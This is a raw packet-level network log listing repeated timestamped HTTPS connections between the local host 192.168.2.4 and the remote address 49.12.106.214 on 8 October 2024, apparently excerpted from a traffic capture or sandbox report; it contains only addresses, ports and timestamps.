                                                                                                                Oct 8, 2024 04:59:38.246704102 CEST49743443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:38.246793032 CEST4434974349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:38.246884108 CEST49743443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:38.247090101 CEST49743443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:38.247112036 CEST4434974349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:38.916523933 CEST4434974349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:38.916623116 CEST49743443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:38.917023897 CEST49743443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:38.917051077 CEST4434974349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:38.918484926 CEST49743443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:38.918497086 CEST4434974349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:39.617882967 CEST4434974349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:39.617989063 CEST49743443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:39.618048906 CEST4434974349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:39.618082047 CEST4434974349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:39.618112087 CEST49743443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:39.618144035 CEST49743443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:39.618180990 CEST49743443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:39.618211031 CEST4434974349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:39.619656086 CEST49744443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:39.619750023 CEST4434974449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:39.619842052 CEST49744443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:39.620028973 CEST49744443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:39.620057106 CEST4434974449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:40.295572042 CEST4434974449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:40.295762062 CEST49744443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:40.296045065 CEST49744443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:40.296072006 CEST4434974449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:40.297420979 CEST49744443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:40.297434092 CEST4434974449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:40.999631882 CEST4434974449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:40.999679089 CEST4434974449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:40.999810934 CEST4434974449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:40.999834061 CEST49744443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:40.999901056 CEST49744443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:41.000088930 CEST49744443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:41.000128031 CEST4434974449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:41.001604080 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:41.001653910 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:41.001749039 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:41.001949072 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:41.001969099 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:41.646688938 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:41.646971941 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:41.647402048 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:41.647429943 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:41.648901939 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:41.648910999 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.331183910 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.331211090 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.331254005 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.331285954 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.331309080 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.331403971 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.331403971 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.331403971 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.331809998 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.331824064 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.333317995 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.333343983 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.333417892 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.333723068 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.333739996 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.993510962 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.993947983 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.994590998 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.994623899 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.996997118 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.997030973 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:43.686055899 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:43.686130047 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:43.686249971 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:43.686249971 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:43.686305046 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:43.686326027 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:43.752198935 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:43.752290964 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:43.752388000 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:43.752674103 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:43.752712011 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:44.408849001 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:44.408957005 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:44.411004066 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:44.411031961 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:44.413357973 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:44.413371086 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:44.413430929 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:44.413450956 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:44.762306929 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:44.762356043 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:44.762449026 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:44.762708902 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:44.762723923 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.187443018 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.187607050 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.187773943 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.187773943 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.188488960 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.188533068 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.421669960 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.421773911 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.422180891 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.422188997 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.424027920 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.424032927 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.853892088 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.853914976 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.853929996 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.853965044 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.854002953 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.854016066 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.854065895 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.884649992 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.884666920 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.884727001 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.884737015 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.884784937 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.957992077 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.958022118 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.958178997 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.958206892 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.958259106 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.983899117 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.983913898 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.983978987 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.983987093 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.984025955 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.022608042 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.022623062 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.022728920 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.022742987 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.022795916 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.047715902 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.047730923 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.047802925 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.047812939 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.047858000 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.069878101 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.069890976 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.069999933 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.070012093 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.070060968 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.085073948 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.085088015 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.085155010 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.085160971 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.085206985 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.103461981 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.103477955 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.103542089 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.103550911 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.103596926 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.121381044 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.121397018 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.121484041 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.121493101 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.121551037 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.135662079 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.135675907 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.135736942 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.135746002 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.135782957 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.151439905 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.151457071 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.151619911 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.151628971 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.151681900 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.164659023 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.164717913 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.164827108 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.164887905 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.164937973 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.164963007 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.173818111 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.173860073 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.173891068 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.173897028 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.173933029 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.173959970 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.183722019 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.183762074 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.183819056 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.183829069 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.183877945 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.191622972 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.191663027 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.191723108 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.191731930 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.191759109 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.191787958 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.200496912 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.200537920 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.200586081 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.200592995 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.200644970 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.208714962 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.208755016 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.208801985 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.208808899 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.208867073 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.219695091 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.219733953 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.219765902 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.219772100 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.219820976 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.233354092 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.233392954 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.233437061 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.233448982 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.233486891 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.233514071 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.245598078 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.245651007 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.245682955 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.245692015 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.245733976 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.257293940 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.257335901 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.257416010 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.257416010 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.257424116 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.257500887 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.265877008 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.265916109 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.265952110 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.265958071 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.265981913 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.266011000 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.275418043 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.275458097 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.275489092 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.275494099 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.275521994 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.275551081 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.284383059 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.284420967 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.284460068 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.284466028 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.284497023 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.284518957 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.291523933 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.291563034 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.291591883 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.291596889 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.291625977 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.291655064 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.300925970 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.301017046 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.301047087 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.301053047 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.301081896 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.301110029 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.320106030 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.320146084 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.320185900 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.320193052 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.320210934 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.320241928 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.332420111 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.332457066 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.332496881 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.332501888 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.332662106 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.332662106 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.344252110 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.344291925 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.344332933 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.344337940 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.344360113 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.344391108 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.353789091 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.353856087 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.353869915 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.353885889 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.353909969 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.353938103 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.365475893 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.365518093 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.365550041 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.365556002 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.365591049 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.365614891 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.371169090 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.371210098 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.371236086 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.371241093 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.371263027 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.371292114 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.378223896 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.378262997 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.378288984 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.378293991 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.378318071 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.378345013 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.387485981 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.387528896 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.387559891 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.387566090 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.387609959 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.407872915 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.407963991 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.407994986 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.408003092 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.408041954 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.419193983 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.419235945 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.419342041 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.419349909 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.419408083 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.419408083 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.430705070 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.430744886 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.430785894 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.430793047 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.430838108 CEST49748443192.168.2.449.12.106.214
